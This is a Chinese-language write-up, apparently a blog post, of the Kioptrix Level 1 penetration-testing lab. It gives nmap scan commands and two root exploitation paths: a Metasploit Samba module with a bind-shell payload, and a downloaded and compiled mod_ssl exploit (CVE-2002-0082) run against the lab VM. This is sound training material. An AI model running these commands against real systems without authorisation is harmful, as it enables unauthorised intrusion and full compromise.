Kioptrix Level 1(#1)

Kioptrix Level 1(#1)

目标:Kioptrix Level 1(VMware)

攻击机:kali(192.168.43.80)

网关:192.168.43.255

#1查看Kioptrix在内网的ip地址

nmap 192.168.43.0/24 -n -sP -sn

-n 不做DNS解析
-sP ping扫描
-sn 不做端口扫描

得到ip192.168.43.36

#2查看端口开放情况(nmap)

nmap 192.168.43.36 -O -sS -sV

-O 进行系统探测
-sS 使用SYN扫描
-sV 探测开启的端口来获取服务、版本信息

22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP) 443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
发现有Samba和Apache OpenSSL
可以使用两种方案 Samba #3-A 和 Apache OpenSSL #3-B


#3-A 利用Samba溢出


工具:metasploit
命令:msfconsole
先search Samba

使用编号11的模块,show options 查看

设置监听模块

set PAYLOAD linux/x86/shell_bind_tcp

set rhost 192.168.43.36

配置完毕 exploit

命令whoami
返回root
溢出成功!


#3-B利用Apache OpenSSL漏洞溢出。

工具:Nikto

命令:nikto -host 192.168.43.36

发现rce
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi- bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
查找一下
searchsploit appache openssl

wget -O 47080.c https://www.exploit-db.com/download/47080

编译出现问题
使用命令apt-get install libssl1.0-dev进行安装

继续编译 gcc -o exp 47080.c -lcrypto 运行发现要找对应版本,Red-Hat/Linux Apache/1.3.20

./exp
./exp | grep apache-1.3.20

符合的有两个0x6a、0x6b,实测0x6a不能用,0x6b可以

./exp 0x6b 192.168.43.36 443

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值